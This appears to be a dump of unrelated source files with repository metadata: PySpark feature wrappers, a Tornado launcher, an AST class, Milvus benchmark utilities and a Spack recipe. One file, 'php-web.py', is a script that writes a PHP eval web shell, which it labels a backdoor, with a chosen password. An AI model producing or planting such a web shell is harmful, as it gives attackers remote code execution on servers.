return self.getOrDefault(self.statement)
@inherit_doc
class StandardScaler(JavaEstimator, HasInputCol, HasOutputCol):
withMean = Param(Params._dummy(), "withMean", "Center data with mean")
withStd = Param(Params._dummy(), "withStd", "Scale to unit standard deviation")
@keyword_only
def __init__(self, withMean=False, withStd=True, inputCol=None, outputCol=None):
super(StandardScaler, self).__init__()
self._java_obj = self._new_java_obj("org.apache.spark.ml.feature.StandardScaler", self.uid)
self.withMean = Param(self, "withMean", "Center data with mean")
self.withStd = Param(self, "withStd", "Scale to unit standard deviation")
self._setDefault(withMean=False, withStd=True)
kwargs = self.__init__._input_kwargs
self.setParams(**kwargs)
@keyword_only
def setParams(self, withMean=False, withStd=True, inputCol=None, outputCol=None):
kwargs = self.setParams._input_kwargs
return self._set(**kwargs)
def setWithMean(self, value):
self._paramMap[self.withMean] = value
return self
def getWithMean(self):
return self.getOrDefault(self.withMean)
def setWithStd(self, value):
self._paramMap[self.withStd] = value
return self
def getWithStd(self):
return self.getOrDefault(self.withStd)
def _create_model(self, java_model):
return StandardScalerModel(java_model)
class StandardScalerModel(JavaModel):
@property
def std(self):
return self._call_java("std")
@property
def mean(self):
return self._call_java("mean")
@inherit_doc
class StringIndexer(JavaEstimator, HasInputCol, HasOutputCol):
@keyword_only
def __init__(self, inputCol=None, outputCol=None):
super(StringIndexer, self).__init__()
self._java_obj = self._new_java_obj("org.apache.spark.ml.feature.StringIndexer", self.uid)
kwargs = self.__init__._input_kwargs
self.setParams(**kwargs)
@keyword_only
def setParams(self, inputCol=None, outputCol=None):
kwargs = self.setParams._input_kwargs
return self._set(**kwargs)
def _create_model(self, java_model):
return StringIndexerModel(java_model)
class StringIndexerModel(JavaModel):
@property
def labels(self):
return self._java_obj.labels
@inherit_doc
class IndexToString(JavaTransformer, HasInputCol, HasOutputCol):
labels = Param(Params._dummy(), "labels",
"Optional array of labels to be provided by the user, if not supplied or " +
"empty, column metadata is read for labels")
@keyword_only
def __init__(self, inputCol=None, outputCol=None, labels=None):
super(IndexToString, self).__init__()
self._java_obj = self._new_java_obj("org.apache.spark.ml.feature.IndexToString",
self.uid)
self.labels = Param(self, "labels",
"Optional array of labels to be provided by the user, if not " +
"supplied or empty, column metadata is read for labels")
kwargs = self.__init__._input_kwargs
self.setParams(**kwargs)
@keyword_only
def setParams(self, inputCol=None, outputCol=None, labels=None):
kwargs = self.setParams._input_kwargs
return self._set(**kwargs)
def setLabels(self, value):
self._paramMap[self.labels] = value
return self
def getLabels(self):
return self.getOrDefault(self.labels)
class StopWordsRemover(JavaTransformer, HasInputCol, HasOutputCol):
stopWords = Param(Params._dummy(), "stopWords", "The words to be filtered out")
caseSensitive = Param(Params._dummy(), "caseSensitive", "whether to do a case sensitive " +
"comparison over the stop words")
@keyword_only
def __init__(self, inputCol=None, outputCol=None, stopWords=None,
caseSensitive=False):
super(StopWordsRemover, self).__init__()
self._java_obj = self._new_java_obj("org.apache.spark.ml.feature.StopWordsRemover",
self.uid)
self.stopWords = Param(self, "stopWords", "The words to be filtered out")
self.caseSensitive = Param(self, "caseSensitive", "whether to do a case " +
"sensitive comparison over the stop words")
stopWordsObj = _jvm().org.apache.spark.ml.feature.StopWords
defaultStopWords = stopWordsObj.English()
self._setDefault(stopWords=defaultStopWords)
kwargs = self.__init__._input_kwargs
self.setParams(**kwargs)
@keyword_only
def setParams(self, inputCol=None, outputCol=None, stopWords=None,
caseSensitive=False):
kwargs = self.setParams._input_kwargs
return self._set(**kwargs)
def setStopWords(self, value):
self._paramMap[self.stopWords] = value
return self
def getStopWords(self):
return self.getOrDefault(self.stopWords)
def setCaseSensitive(self, value):
self._paramMap[self.caseSensitive] = value
return self
def getCaseSensitive(self):
return self.getOrDefault(self.caseSensitive)
@inherit_doc
@ignore_unicode_prefix
class Tokenizer(JavaTransformer, HasInputCol, HasOutputCol):
@keyword_only
def __init__(self, inputCol=None, outputCol=None):
super(Tokenizer, self).__init__()
self._java_obj = self._new_java_obj("org.apache.spark.ml.feature.Tokenizer", self.uid)
kwargs = self.__init__._input_kwargs
self.setParams(**kwargs)
@keyword_only
def setParams(self, inputCol=None, outputCol=None):
kwargs = self.setParams._input_kwargs
return self._set(**kwargs)
@inherit_doc
class VectorAssembler(JavaTransformer, HasInputCols, HasOutputCol):
@keyword_only
def __init__(self, inputCols=None, outputCol=None):
super(VectorAssembler, self).__init__()
self._java_obj = self._new_java_obj("org.apache.spark.ml.feature.VectorAssembler", self.uid)
kwargs = self.__init__._input_kwargs
self.setParams(**kwargs)
@keyword_only
def setParams(self, inputCols=None, outputCol=None):
kwargs = self.setParams._input_kwargs
return self._set(**kwargs)
@inherit_doc
class VectorIndexer(JavaEstimator, HasInputCol, HasOutputCol):
maxCategories = Param(Params._dummy(), "maxCategories",
"Threshold for the number of values a categorical feature can take " +
"(>= 2). If a feature is found to have > maxCategories values, then " +
"it is declared continuous.")
@keyword_only
def __init__(self, maxCategories=20, inputCol=None, outputCol=None):
super(VectorIndexer, self).__init__()
self._java_obj = self._new_java_obj("org.apache.spark.ml.feature.VectorIndexer", self.uid)
self.maxCategories = Param(self, "maxCategories",
"Threshold for the number of values a categorical feature " +
"can take (>= 2). If a feature is found to have " +
"> maxCategories values, then it is declared continuous.")
self._setDefault(maxCategories=20)
kwargs = self.__init__._input_kwargs
self.setParams(**kwargs)
@keyword_only
def setParams(self, maxCategories=20, inputCol=None, outputCol=None):
kwargs = self.setParams._input_kwargs
return self._set(**kwargs)
def setMaxCategories(self, value):
self._paramMap[self.maxCategories] = value
return self
def getMaxCategories(self):
return self.getOrDefault(self.maxCategories)
def _create_model(self, java_model):
return VectorIndexerModel(java_model)
class VectorIndexerModel(JavaModel):
@inherit_doc
class VectorSlicer(JavaTransformer, HasInputCol, HasOutputCol):
indices = Param(Params._dummy(), "indices", "An array of indices to select features from " +
"a vector column. There can be no overlap with names.")
names = Param(Params._dummy(), "names", "An array of feature names to select features from " +
"a vector column. These names must be specified by ML " +
"org.apache.spark.ml.attribute.Attribute. There can be no overlap with " +
"indices.")
@keyword_only
def __init__(self, inputCol=None, outputCol=None, indices=None, names=None):
super(VectorSlicer, self).__init__()
self._java_obj = self._new_java_obj("org.apache.spark.ml.feature.VectorSlicer", self.uid)
self.indices = Param(self, "indices", "An array of indices to select features from " +
"a vector column. There can be no overlap with names.")
self.names = Param(self, "names", "An array of feature names to select features from " +
"a vector column. These names must be specified by ML " +
"org.apache.spark.ml.attribute.Attribute. There can be no overlap " +
"with indices.")
kwargs = self.__init__._input_kwargs
self.setParams(**kwargs)
@keyword_only
def setParams(self, inputCol=None, outputCol=None, indices=None, names=None):
kwargs = self.setParams._input_kwargs
return self._set(**kwargs)
def setIndices(self, value):
self._paramMap[self.indices] = value
return self
def getIndices(self):
return self.getOrDefault(self.indices)
def setNames(self, value):
self._paramMap[self.names] = value
return self
def getNames(self):
return self.getOrDefault(self.names)
@inherit_doc
@ignore_unicode_prefix
class Word2Vec(JavaEstimator, HasStepSize, HasMaxIter, HasSeed, HasInputCol, HasOutputCol):
vectorSize = Param(Params._dummy(), "vectorSize",
"the dimension of codes after transforming from words")
numPartitions = Param(Params._dummy(), "numPartitions",
"number of partitions for sentences of words")
minCount = Param(Params._dummy(), "minCount",
"the minimum number of times a token must appear to be included in the " +
"word2vec model's vocabulary")
@keyword_only
def __init__(self, vectorSize=100, minCount=5, numPartitions=1, stepSize=0.025, maxIter=1,
seed=None, inputCol=None, outputCol=None):
super(Word2Vec, self).__init__()
self._java_obj = self._new_java_obj("org.apache.spark.ml.feature.Word2Vec", self.uid)
self.vectorSize = Param(self, "vectorSize",
"the dimension of codes after transforming from words")
self.numPartitions = Param(self, "numPartitions",
"number of partitions for sentences of words")
self.minCount = Param(self, "minCount",
"the minimum number of times a token must appear to be included " +
"in the word2vec model's vocabulary")
self._setDefault(vectorSize=100, minCount=5, numPartitions=1, stepSize=0.025, maxIter=1,
seed=None)
kwargs = self.__init__._input_kwargs
self.setParams(**kwargs)
@keyword_only
def setParams(self, vectorSize=100, minCount=5, numPartitions=1, stepSize=0.025, maxIter=1,
seed=None, inputCol=None, outputCol=None):
kwargs = self.setParams._input_kwargs
return self._set(**kwargs)
def setVectorSize(self, value):
self._paramMap[self.vectorSize] = value
return self
def getVectorSize(self):
return self.getOrDefault(self.vectorSize)
def setNumPartitions(self, value):
self._paramMap[self.numPartitions] = value
return self
def getNumPartitions(self):
return self.getOrDefault(self.numPartitions)
def setMinCount(self, value):
self._paramMap[self.minCount] = value
return self
def getMinCount(self):
return self.getOrDefault(self.minCount)
def _create_model(self, java_model):
return Word2VecModel(java_model)
class Word2VecModel(JavaModel):
def getVectors(self):
return self._call_java("getVectors")
def findSynonyms(self, word, num):
if not isinstance(word, basestring):
word = _convert_to_vector(word)
return self._call_java("findSynonyms", word, num)
@inherit_doc
class PCA(JavaEstimator, HasInputCol, HasOutputCol):
k = Param(Params._dummy(), "k", "the number of principal components")
@keyword_only
def __init__(self, k=None, inputCol=None, outputCol=None):
super(PCA, self).__init__()
self._java_obj = self._new_java_obj("org.apache.spark.ml.feature.PCA", self.uid)
self.k = Param(self, "k", "the number of principal components")
kwargs = self.__init__._input_kwargs
self.setParams(**kwargs)
@keyword_only
def setParams(self, k=None, inputCol=None, outputCol=None):
kwargs = self.setParams._input_kwargs
return self._set(**kwargs)
def setK(self, value):
self._paramMap[self.k] = value
return self
def getK(self):
return self.getOrDefault(self.k)
def _create_model(self, java_model):
return PCAModel(java_model)
class PCAModel(JavaModel):
@inherit_doc
class RFormula(JavaEstimator, HasFeaturesCol, HasLabelCol):
formula = Param(Params._dummy(), "formula", "R model formula")
@keyword_only
def __init__(self, formula=None, featuresCol="features", labelCol="label"):
super(RFormula, self).__init__()
self._java_obj = self._new_java_obj("org.apache.spark.ml.feature.RFormula", self.uid)
self.formula = Param(self, "formula", "R model formula")
kwargs = self.__init__._input_kwargs
self.setParams(**kwargs)
@keyword_only
def setParams(self, formula=None, featuresCol="features", labelCol="label"):
kwargs = self.setParams._input_kwargs
return self._set(**kwargs)
def setFormula(self, value):
self._paramMap[self.formula] = value
return self
def getFormula(self):
return self.getOrDefault(self.formula)
def _create_model(self, java_model):
return RFormulaModel(java_model)
class RFormulaModel(JavaModel):
if __name__ == "__main__":
import doctest
from pyspark.context import SparkContext
from pyspark.sql import Row, SQLContext
globs = globals().copy()
sc = SparkContext("local[2]", "ml.feature tests")
sqlContext = SQLContext(sc)
globs['sc'] = sc
globs['sqlContext'] = sqlContext
testData = sc.parallelize([Row(id=0, label="a"), Row(id=1, label="b"),
Row(id=2, label="c"), Row(id=3, label="a"),
Row(id=4, label="a"), Row(id=5, label="c")], 2)
globs['stringIndDf'] = sqlContext.createDataFrame(testData)
(failure_count, test_count) = doctest.testmod(globs=globs, optionflags=doctest.ELLIPSIS)
sc.stop()
if failure_count:
exit(-1)
| true
| true
|
1c4234b59d2bb634497dd779d5c0cfcece2d0d7f
| 315
|
py
|
Python
|
run.py
|
andreafioraldi/ascii-ctf
|
d1ca4e7826cb5a0fe4600cdd769d35eecd0125d0
|
[
"BSD-2-Clause"
] | 8
|
2019-03-20T09:11:24.000Z
|
2021-12-04T21:42:57.000Z
|
run.py
|
andreafioraldi/ascii-ctf
|
d1ca4e7826cb5a0fe4600cdd769d35eecd0125d0
|
[
"BSD-2-Clause"
] | null | null | null |
run.py
|
andreafioraldi/ascii-ctf
|
d1ca4e7826cb5a0fe4600cdd769d35eecd0125d0
|
[
"BSD-2-Clause"
] | 3
|
2019-05-18T06:56:34.000Z
|
2021-12-23T13:45:52.000Z
|
from tornado.wsgi import WSGIContainer
from tornado.httpserver import HTTPServer
from tornado.ioloop import IOLoop
from ascii_ctf import app
import os
http_server = HTTPServer(WSGIContainer(app))
http_server.listen(5000 if os.getenv("PORT") is None else int(os.getenv("PORT")),'0.0.0.0')
IOLoop.instance().start()
| 31.5
| 91
| 0.793651
|
from tornado.wsgi import WSGIContainer
from tornado.httpserver import HTTPServer
from tornado.ioloop import IOLoop
from ascii_ctf import app
import os
http_server = HTTPServer(WSGIContainer(app))
http_server.listen(5000 if os.getenv("PORT") is None else int(os.getenv("PORT")),'0.0.0.0')
IOLoop.instance().start()
| true
| true
|
1c423684b4b593f020b9926639ad1cddd04c6111
| 1,387
|
py
|
Python
|
playground/abstract/abs_ast.py
|
drew-loukusa/lang-playground
|
16e64001444f9cb20bc24228ea6588811e96eea0
|
[
"MIT"
] | null | null | null |
playground/abstract/abs_ast.py
|
drew-loukusa/lang-playground
|
16e64001444f9cb20bc24228ea6588811e96eea0
|
[
"MIT"
] | null | null | null |
playground/abstract/abs_ast.py
|
drew-loukusa/lang-playground
|
16e64001444f9cb20bc24228ea6588811e96eea0
|
[
"MIT"
] | null | null | null |
class AST:
def __init__(self, token=None, artificial=False, name=None):
self.name = (
name # Artificial nodes won't have any "token_text", so give them a name
)
self.token = token # From which token did we create node?
self.children = [] # normalized list of AST nodes
self.artificial = artificial
def is_none(self):
return self.token is None
def add_child(self, t):
self.children.append(t)
def add_children(self, *children):
for child in children:
self.children.append(child)
def __repr__(self):
token = str(self.token) if self.token is not None else None
artificial = self.name + " " if self.name is not None else None
token_info = None
if self.artificial:
token_info = "ARTIFICIAL - " + artificial
else:
token_info = token
ast_rep = f"<PG_AST: {token_info}>"
return ast_rep
def to_string_tree(self, tab=0):
if len(self.children) == 0:
print("| " * tab + str(self))
return
if not self.is_none():
print("| " * tab + f"{self}")
elif self.is_none() and self.artificial:
print("| " * tab + f"{self}")
for child in self.children:
            if child is not None:
child.to_string_tree(tab + 1)
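

# Illustrative usage sketch (not part of the original module): building a tiny tree with
# an artificial root and printing it. The string tokens below are hypothetical stand-ins
# for whatever token objects the parser produces.
def _ast_example():
    root = AST(artificial=True, name="EXPR")
    plus = AST(token="+")
    plus.add_children(AST(token="1"), AST(token="2"))
    root.add_child(plus)
    root.to_string_tree()  # prints one "| " per nesting level: the root, then '+', then '1' and '2'
    return root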
| 30.152174
| 85
| 0.55876
|
class AST:
def __init__(self, token=None, artificial=False, name=None):
self.name = (
name
)
self.token = token # From which token did we create node?
self.children = [] # normalized list of AST nodes
self.artificial = artificial
def is_none(self):
return self.token is None
def add_child(self, t):
self.children.append(t)
def add_children(self, *children):
for child in children:
self.children.append(child)
def __repr__(self):
token = str(self.token) if self.token is not None else None
artificial = self.name + " " if self.name is not None else None
token_info = None
if self.artificial:
token_info = "ARTIFICIAL - " + artificial
else:
token_info = token
ast_rep = f"<PG_AST: {token_info}>"
return ast_rep
def to_string_tree(self, tab=0):
if len(self.children) == 0:
print("| " * tab + str(self))
return
if not self.is_none():
print("| " * tab + f"{self}")
elif self.is_none() and self.artificial:
print("| " * tab + f"{self}")
for child in self.children:
            if child is not None:
child.to_string_tree(tab + 1)
| true
| true
|
1c4236b5748bbe5e651eeeafccab2cbb7c42f1db
| 7,836
|
py
|
Python
|
tests/benchmark/milvus_benchmark/utils.py
|
haorenfsa/milvus
|
d8bab0cd21ce3d76576b4f75f76e1224bb1b5548
|
[
"Apache-2.0"
] | null | null | null |
tests/benchmark/milvus_benchmark/utils.py
|
haorenfsa/milvus
|
d8bab0cd21ce3d76576b4f75f76e1224bb1b5548
|
[
"Apache-2.0"
] | null | null | null |
tests/benchmark/milvus_benchmark/utils.py
|
haorenfsa/milvus
|
d8bab0cd21ce3d76576b4f75f76e1224bb1b5548
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
import time
import logging
import string
import random
import json
import os
from yaml.representer import SafeRepresenter
# from yaml import full_load, dump
import yaml
import tableprint as tp
# from pprint import pprint
import config
logger = logging.getLogger("milvus_benchmark.utils")
def timestr_to_int(time_str):
""" Parse the test time set in the yaml configuration file and convert it to int type """
# time_int = 0
if isinstance(time_str, int) or time_str.isdigit():
time_int = int(time_str)
elif time_str.endswith("s"):
time_int = int(time_str.split("s")[0])
elif time_str.endswith("m"):
time_int = int(time_str.split("m")[0]) * 60
elif time_str.endswith("h"):
time_int = int(time_str.split("h")[0]) * 60 * 60
else:
        raise Exception("%s is not supported" % time_str)
return time_int
class literal_str(str): pass
def change_style(style, representer):
def new_representer(dumper, data):
scalar = representer(dumper, data)
scalar.style = style
return scalar
return new_representer
# from yaml.representer import SafeRepresenter
# represent_str does handle some corner cases, so use that
# instead of calling represent_scalar directly
represent_literal_str = change_style('|', SafeRepresenter.represent_str)
yaml.add_representer(literal_str, represent_literal_str)
def retry(times):
"""
    Retry the decorated function up to `times` times, retrying on exceptions or falsy results and sleeping 3 seconds between attempts.
"""
def wrapper(func):
def newfn(*args, **kwargs):
attempt = 0
while attempt < times:
try:
result = func(*args, **kwargs)
if result:
break
else:
raise Exception("Result false")
except Exception as e:
logger.info(str(e))
time.sleep(3)
attempt += 1
return result
return newfn
return wrapper
def convert_nested(dct):
def insert(dct, lst):
for x in lst[:-2]:
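            # chained assignment: store the child dict (creating it if missing) at dct[x], then rebind dct to descend into it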
dct[x] = dct = dct.get(x, dict())
dct.update({lst[-2]: lst[-1]})
# empty dict to store the result
result = dict()
# create an iterator of lists
# representing nested or hierarchial flow
lsts = ([*k.split("."), v] for k, v in dct.items())
# insert each list into the result
for lst in lsts:
insert(result, lst)
return result
def get_unique_name(prefix=None):
if prefix is None:
prefix = "distributed-benchmark-test-"
return prefix + "".join(random.choice(string.ascii_letters + string.digits) for _ in range(8)).lower()
def get_current_time():
""" return current time"""
return time.strftime('%Y-%m-%d %H:%M:%S', time.localtime())
def print_table(headers, columns, data):
bodys = []
for index, value in enumerate(columns):
tmp = [value]
tmp.extend(data[index])
bodys.append(tmp)
tp.table(bodys, headers)
def get_deploy_mode(deploy_params):
"""
Get the server deployment mode set in the yaml configuration file
single, cluster, cluster_3rd
"""
deploy_mode = None
if deploy_params:
milvus_params = None
if "milvus" in deploy_params:
milvus_params = deploy_params["milvus"]
if not milvus_params:
deploy_mode = config.DEFUALT_DEPLOY_MODE
elif "deploy_mode" in milvus_params:
deploy_mode = milvus_params["deploy_mode"]
if deploy_mode not in [config.SINGLE_DEPLOY_MODE, config.CLUSTER_DEPLOY_MODE]:
raise Exception("Invalid deploy mode: %s" % deploy_mode)
return deploy_mode
def get_server_tag(deploy_params):
"""
Get service deployment configuration
e.g.:
server:
server_tag: "8c16m"
"""
server_tag = ""
if deploy_params and "server" in deploy_params:
server = deploy_params["server"]
server_tag = server["server_tag"] if "server_tag" in server else ""
return server_tag
def dict_update(source, target):
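    # Recursively merge `source` into `target`: nested dicts are merged, any other value overwrites the target entry.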
for key, value in source.items():
if isinstance(value, dict) and key in target:
dict_update(source[key], target[key])
else:
target[key] = value
return target
def search_param_analysis(vector_query, filter_query):
""" Search parameter adjustment, applicable pymilvus version >= 2.0.0rc7.dev24 """
if "vector" in vector_query:
vector = vector_query["vector"]
else:
logger.error("[search_param_analysis] vector not in vector_query")
return False
data = []
anns_field = ""
param = {}
limit = 1
if isinstance(vector, dict) and len(vector) == 1:
for key in vector:
anns_field = key
data = vector[key]["query"]
param = {"metric_type": vector[key]["metric_type"],
"params": vector[key]["params"]}
limit = vector[key]["topk"]
else:
logger.error("[search_param_analysis] vector not dict or len != 1: %s" % str(vector))
return False
if isinstance(filter_query, list) and len(filter_query) != 0 and "range" in filter_query[0]:
filter_range = filter_query[0]["range"]
if isinstance(filter_range, dict) and len(filter_range) == 1:
for key in filter_range:
field_name = filter_range[key]
expression = None
if 'GT' in filter_range[key]:
exp1 = "%s > %s" % (field_name, str(filter_range[key]['GT']))
expression = exp1
if 'LT' in filter_range[key]:
exp2 = "%s < %s" % (field_name, str(filter_range[key]['LT']))
if expression:
expression = expression + ' && ' + exp2
else:
expression = exp2
else:
logger.error("[search_param_analysis] filter_range not dict or len != 1: %s" % str(filter_range))
return False
else:
# logger.debug("[search_param_analysis] range not in filter_query: %s" % str(filter_query))
expression = None
result = {
"data": data,
"anns_field": anns_field,
"param": param,
"limit": limit,
"expression": expression
}
# logger.debug("[search_param_analysis] search_param_analysis: %s" % str(result))
return result
def modify_file(file_path_list, is_modify=False, input_content=""):
"""
file_path_list : file list -> list[<file_path>]
    is_modify : whether the file needs to be reset
    input_content : the content that needs to be inserted into the file
"""
if not isinstance(file_path_list, list):
print("[modify_file] file is not a list.")
for file_path in file_path_list:
folder_path, file_name = os.path.split(file_path)
if not os.path.isdir(folder_path):
            print("[modify_file] folder (%s) does not exist." % folder_path)
os.makedirs(folder_path)
if not os.path.isfile(file_path):
            print("[modify_file] file (%s) does not exist." % file_path)
os.mknod(file_path)
else:
if is_modify is True:
print("[modify_file] start modifying file(%s)..." % file_path)
with open(file_path, "r+") as f:
f.seek(0)
f.truncate()
f.write(input_content)
f.close()
print("[modify_file] file(%s) modification is complete." % file_path_list)
def read_json_file(file_name):
""" return content of json file """
with open(file_name) as f:
file_dict = json.load(f)
return file_dict
| 31.219124
| 109
| 0.596988
|
import time
import logging
import string
import random
import json
import os
from yaml.representer import SafeRepresenter
import yaml
import tableprint as tp
import config
logger = logging.getLogger("milvus_benchmark.utils")
def timestr_to_int(time_str):
if isinstance(time_str, int) or time_str.isdigit():
time_int = int(time_str)
elif time_str.endswith("s"):
time_int = int(time_str.split("s")[0])
elif time_str.endswith("m"):
time_int = int(time_str.split("m")[0]) * 60
elif time_str.endswith("h"):
time_int = int(time_str.split("h")[0]) * 60 * 60
else:
        raise Exception("%s is not supported" % time_str)
return time_int
class literal_str(str): pass
def change_style(style, representer):
def new_representer(dumper, data):
scalar = representer(dumper, data)
scalar.style = style
return scalar
return new_representer
represent_literal_str = change_style('|', SafeRepresenter.represent_str)
yaml.add_representer(literal_str, represent_literal_str)
def retry(times):
def wrapper(func):
def newfn(*args, **kwargs):
attempt = 0
while attempt < times:
try:
result = func(*args, **kwargs)
if result:
break
else:
raise Exception("Result false")
except Exception as e:
logger.info(str(e))
time.sleep(3)
attempt += 1
return result
return newfn
return wrapper
def convert_nested(dct):
def insert(dct, lst):
for x in lst[:-2]:
dct[x] = dct = dct.get(x, dict())
dct.update({lst[-2]: lst[-1]})
result = dict()
lsts = ([*k.split("."), v] for k, v in dct.items())
for lst in lsts:
insert(result, lst)
return result
def get_unique_name(prefix=None):
if prefix is None:
prefix = "distributed-benchmark-test-"
return prefix + "".join(random.choice(string.ascii_letters + string.digits) for _ in range(8)).lower()
def get_current_time():
return time.strftime('%Y-%m-%d %H:%M:%S', time.localtime())
def print_table(headers, columns, data):
bodys = []
for index, value in enumerate(columns):
tmp = [value]
tmp.extend(data[index])
bodys.append(tmp)
tp.table(bodys, headers)
def get_deploy_mode(deploy_params):
deploy_mode = None
if deploy_params:
milvus_params = None
if "milvus" in deploy_params:
milvus_params = deploy_params["milvus"]
if not milvus_params:
deploy_mode = config.DEFUALT_DEPLOY_MODE
elif "deploy_mode" in milvus_params:
deploy_mode = milvus_params["deploy_mode"]
if deploy_mode not in [config.SINGLE_DEPLOY_MODE, config.CLUSTER_DEPLOY_MODE]:
raise Exception("Invalid deploy mode: %s" % deploy_mode)
return deploy_mode
def get_server_tag(deploy_params):
server_tag = ""
if deploy_params and "server" in deploy_params:
server = deploy_params["server"]
server_tag = server["server_tag"] if "server_tag" in server else ""
return server_tag
def dict_update(source, target):
for key, value in source.items():
if isinstance(value, dict) and key in target:
dict_update(source[key], target[key])
else:
target[key] = value
return target
def search_param_analysis(vector_query, filter_query):
if "vector" in vector_query:
vector = vector_query["vector"]
else:
logger.error("[search_param_analysis] vector not in vector_query")
return False
data = []
anns_field = ""
param = {}
limit = 1
if isinstance(vector, dict) and len(vector) == 1:
for key in vector:
anns_field = key
data = vector[key]["query"]
param = {"metric_type": vector[key]["metric_type"],
"params": vector[key]["params"]}
limit = vector[key]["topk"]
else:
logger.error("[search_param_analysis] vector not dict or len != 1: %s" % str(vector))
return False
if isinstance(filter_query, list) and len(filter_query) != 0 and "range" in filter_query[0]:
filter_range = filter_query[0]["range"]
if isinstance(filter_range, dict) and len(filter_range) == 1:
for key in filter_range:
field_name = filter_range[key]
expression = None
if 'GT' in filter_range[key]:
exp1 = "%s > %s" % (field_name, str(filter_range[key]['GT']))
expression = exp1
if 'LT' in filter_range[key]:
exp2 = "%s < %s" % (field_name, str(filter_range[key]['LT']))
if expression:
expression = expression + ' && ' + exp2
else:
expression = exp2
else:
logger.error("[search_param_analysis] filter_range not dict or len != 1: %s" % str(filter_range))
return False
else:
expression = None
result = {
"data": data,
"anns_field": anns_field,
"param": param,
"limit": limit,
"expression": expression
}
return result
def modify_file(file_path_list, is_modify=False, input_content=""):
if not isinstance(file_path_list, list):
print("[modify_file] file is not a list.")
for file_path in file_path_list:
folder_path, file_name = os.path.split(file_path)
if not os.path.isdir(folder_path):
            print("[modify_file] folder (%s) does not exist." % folder_path)
os.makedirs(folder_path)
if not os.path.isfile(file_path):
            print("[modify_file] file (%s) does not exist." % file_path)
os.mknod(file_path)
else:
if is_modify is True:
print("[modify_file] start modifying file(%s)..." % file_path)
with open(file_path, "r+") as f:
f.seek(0)
f.truncate()
f.write(input_content)
f.close()
print("[modify_file] file(%s) modification is complete." % file_path_list)
def read_json_file(file_name):
with open(file_name) as f:
file_dict = json.load(f)
return file_dict
| true
| true
|
1c4237c8308eb73fae7beab7359bba15be44693b
| 306
|
py
|
Python
|
setup.py
|
ipkn/somebox
|
1fedaa07236402269b8ad10dc9563f3d90aaead1
|
[
"MIT"
] | 4
|
2017-12-25T10:36:15.000Z
|
2018-01-01T10:42:34.000Z
|
setup.py
|
ipkn/somebox
|
1fedaa07236402269b8ad10dc9563f3d90aaead1
|
[
"MIT"
] | null | null | null |
setup.py
|
ipkn/somebox
|
1fedaa07236402269b8ad10dc9563f3d90aaead1
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
from distutils.core import setup
setup(name='somebox',
version='0.0.1',
description='Dropbox-like file sharing service',
author='Jaeseung Ha',
author_email='ipknhama@gmail.com',
url='https://github.com/ipkn/somebox',
packages=['somebox'],
)
| 23.538462
| 54
| 0.640523
|
from distutils.core import setup
setup(name='somebox',
version='0.0.1',
description='Dropbox-like file sharing service',
author='Jaeseung Ha',
author_email='ipknhama@gmail.com',
url='https://github.com/ipkn/somebox',
packages=['somebox'],
)
| true
| true
|
1c42381fa1ef141081328c94ed77762e9634c47f
| 1,079
|
py
|
Python
|
auxiliary/summon/php-web.py
|
Qmeimei10086/T-BOX
|
5ca58311861b121fd337d26412e0f6ba8200ab66
|
[
"MIT"
] | 5
|
2020-07-17T03:13:49.000Z
|
2021-07-26T14:17:15.000Z
|
auxiliary/summon/php-web.py
|
Qmeimei10086/T-BOX
|
5ca58311861b121fd337d26412e0f6ba8200ab66
|
[
"MIT"
] | null | null | null |
auxiliary/summon/php-web.py
|
Qmeimei10086/T-BOX
|
5ca58311861b121fd337d26412e0f6ba8200ab66
|
[
"MIT"
] | 2
|
2020-09-28T14:46:26.000Z
|
2021-04-26T07:42:07.000Z
|
import os
password = '123456'
def summon_php(password):
f = open('shell.txt','w')
f.write("<?php @eval($_POST['")
f.write(password)
f.write("']); ?>")
f.close()
os.rename('shell.txt','shell.php')
    print('[*]Generation complete R > /shell.php',' password: '+password)
while True:
cmd = input('T-BOX auxiliary(summon/php) >')
if cmd == 'show options':
print(' ')
print('----------name---------content------------present---------')
        print('          password        ' + password + '        backdoor password      ')
print(' ')
elif cmd == '':
pass
elif cmd[:13] == 'set password ':
password = cmd[13:]
print('[*]password ==> '+password)
elif cmd == 'run':
print('start.......')
summon_php(password=password)
elif cmd == 'back':
break
else:
print("[-]can't find command: " + cmd)
| 26.317073
| 76
| 0.39481
|
import os
password = '123456'
def summon_php(password):
f = open('shell.txt','w')
f.write("<?php @eval($_POST['")
f.write(password)
f.write("']); ?>")
f.close()
os.rename('shell.txt','shell.php')
    print('[*]Generation complete R > /shell.php',' password: '+password)
while True:
cmd = input('T-BOX auxiliary(summon/php) >')
if cmd == 'show options':
print(' ')
print('----------name---------content------------present---------')
        print('          password        ' + password + '        backdoor password      ')
print(' ')
elif cmd == '':
pass
elif cmd[:13] == 'set password ':
password = cmd[13:]
print('[*]password ==> '+password)
elif cmd == 'run':
print('start.......')
summon_php(password=password)
elif cmd == 'back':
break
else:
print("[-]can't find command: " + cmd)
| true
| true
|
1c42382591392e7525836c3f91d1ee5694ec9c32
| 1,011
|
py
|
Python
|
var/spack/repos/builtin/packages/atom-dft/package.py
|
HaochengLIU/spack
|
26e51ff1705a4d6234e2a0cf734f93f7f95df5cb
|
[
"ECL-2.0",
"Apache-2.0",
"MIT"
] | 2
|
2018-11-27T03:39:44.000Z
|
2021-09-06T15:50:35.000Z
|
var/spack/repos/builtin/packages/atom-dft/package.py
|
HaochengLIU/spack
|
26e51ff1705a4d6234e2a0cf734f93f7f95df5cb
|
[
"ECL-2.0",
"Apache-2.0",
"MIT"
] | 1
|
2019-01-11T20:11:52.000Z
|
2019-01-11T20:11:52.000Z
|
var/spack/repos/builtin/packages/atom-dft/package.py
|
HaochengLIU/spack
|
26e51ff1705a4d6234e2a0cf734f93f7f95df5cb
|
[
"ECL-2.0",
"Apache-2.0",
"MIT"
] | 1
|
2020-10-14T14:20:17.000Z
|
2020-10-14T14:20:17.000Z
|
# Copyright 2013-2018 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class AtomDft(MakefilePackage):
"""ATOM is a program for DFT calculations in atoms and pseudopotential
generation."""
homepage = "https://departments.icmab.es/leem/siesta/Pseudopotentials/"
url = "https://departments.icmab.es/leem/siesta/Pseudopotentials/Code/atom-4.2.6.tgz"
version('4.2.6', 'c0c80cf349f951601942ed6c7cb0256b')
depends_on('libgridxc')
depends_on('xmlf90')
def edit(self, spec, prefix):
